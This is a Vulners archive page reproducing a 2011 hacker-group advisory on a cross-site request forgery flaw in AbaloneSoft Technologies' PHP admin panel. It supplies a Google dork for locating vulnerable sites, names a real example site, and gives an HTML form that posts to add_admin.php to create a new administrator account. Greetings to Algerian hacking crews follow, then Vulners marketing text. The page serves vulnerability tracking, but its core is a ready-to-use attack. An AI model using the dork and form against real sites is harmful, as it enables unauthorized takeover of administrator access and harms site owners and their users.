Vulners
Lucene search
AbaloneSoft Technologies CSRF Vulnerability (Add Admin)
###
# Title : AbaloneSoft Technologies CSRF Vulnerability (Add Admin)
# Author : KedAns-Dz
# E-mail : [email protected]
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# Download : http://www.yuvajobs.com/download-Abalonesoft+Technologies-placement-papers
# platform : php
# Impact : Add Admin
# Tested on : Windows XP sp3 FR
###
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
###
# Go0gle Dork : " Powered by AbaloneSoft Technologies "
###
# Demo : http://[Target]/[Path]/html/admin/add_admin.html
# Example : http://www.odolyss.com/html/admin/add_admin.html
==================[ HTML CODE ]====================
***************************************************
<script language="javascript" type="text/javascript" src="http://[LocalHost]/../js/admin/checkadmin.js"></script>
<form id="add_admin" name="add_admin" method="post" action="add_admin.php">
<td width=100% height="100%" valign=top>
<table width="100%" height="50%" class="innertable" border="0" align="center" cellpadding="1" cellspacing="1">
<tr colfont="4" height=10><td></td></tr>
<tr>
<td valign="top">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="1%" valign="top" style="padding-left:5px;"> </td>
<TD width="99%" valign="top" style="padding-left:10px;" align="top" >
<table width="100%" border="0" cellspacing="1" cellpadding="0" vspace="0" class="border" align="center" >
<tr>
<td valign="top"><table width="100%" border="0" cellspacing="1" cellpadding="0" >
<!--<tr> <td align="center" height="5" colspan="2">&nbps;</td> </tr>-->
<tr >
<td colspan="3" height="19" style="padding-left:5px" class="tdbg">Add User </td>
</tr>
<tr>
<td align="center" height="5" colspan="3">&nbps;</td>
</tr>
<tr>
<td height="1" colspan="3" class="blacktext" ></td>
</tr>
<tr >
<td height="10" colspan="3" valign="middle" class="normal_text"><span class="asterisk">* Field is mandatory</span></td>
</tr>
<!--<tr>
<td width="50%" colspan="2" class="normal_text" align="left" style="padding-bottom:5px; padding-left:300px;"><font color="#E66F17"><?=$msg?> </font></td>
</tr>-->
<tr>
<td height="41" colspan="3" style="padding-left:400px" class="error_text"><?=$msg_admin?><?=$errorMessage;?>
<?=$oldperror?></td>
</tr>
<tr>
<td width="50%" align="right" class="normal_text" style="left:200px"> User Name : </td>
<td width="25%"><input name="txtuser" type="text" id="txtuser" regexp="JSVAL_RX_FC" value="<?= $adminName; ?>" required=1 err="Please enter admin name." class="textbox1" />
<font color="#FF0000">*</font>
<!-- <span class="catagories">*</span>-->
<input name="adminid" type="hidden" value="<?=$id?>" /></td>
<td width="25%"><div id="erruser" name="erruser" class="error_text"></div></td>
</tr>
<tr>
<td height="31" align="right" class="normal_text">New Password : </td>
<td><input type="password" name="txtnpass" id="txtnpass" required="1" err="Please enter new password." regexp="JSVAL_RX_PS"class="textbox1"/>
<font color="#FF0000">*</font>
<!--<span class="catagories">&nbps;*</span>--></td>
<td><div id="errpass" name="errpass" class="error_text"></div></td>
</tr>
<tr>
<td height="31" align="right" class="normal_text">Conform Password : </td>
<td><input type="password" name="txt_cpass" minlength="5" required="1" err="Please enter valid password." regexp="JSVAL_RX_PS" class="textbox1" id="txt_cpass" />
<font color="#FF0000">*</font>
<!--<span class="catagories">&nbps;*</span>--></td>
<td><div id="errcpass" name="errcpass" class="error_text"></div></td>
</tr>
<tr>
<td align="right" class="normal_text">E-mail ID : </td>
<td><input name="txt_email" type="text" id="txt_email" class="textbox1" value="<?= $adminMail?>" required=1 err="Please enter valid e-mail address." regexp="JSVAL_RX_NEWEMAIL" />
<font color="#FF0000">*</font>
<!--<span class="catagories">&nbps;*</span>--></td>
<td><div id="errmail" name="errmail" class="error_text"></div></td>
</tr>
<tr>
<td height="5"></td>
</tr>
<tr>
<td align="right"><input type="hidden" name="Submit" value="Submit" /></td>
<td colspan="2" style="padding-left:25px;"><input type="button" class="button" name="Submit" value="Submit" onclick="allval();" /></td>
</tr>
<tr>
<td height="7"></td>
</tr>
</table></td>
</tr>
</table>
</TD></tr></table>
<!------------------- content end here ----------------------->
</td></tr></table>
</form>
</td>
</tr>
</td>
</tr>
</table>
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
# Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX
# Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# [ Special Greets to 3 em EnGineering Electric Class , BACALORIA 2011 Enchallah
# Messas Secondary School - Ain mlilla - 04300 - Algeria ] ,
# Greets All Bad Boys (cité 1850 logts - HassiMessaouD - 30008 -Algeria ) ,
# hotturks.org : TeX * KadaVra ... all Others
# Kelvin.Xgr ( kelvinx.net)
#===========================================================================
# 0day.today [2018-01-03] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Mar 2011 00:00Current
7.1High risk
Vulners AI Score7.1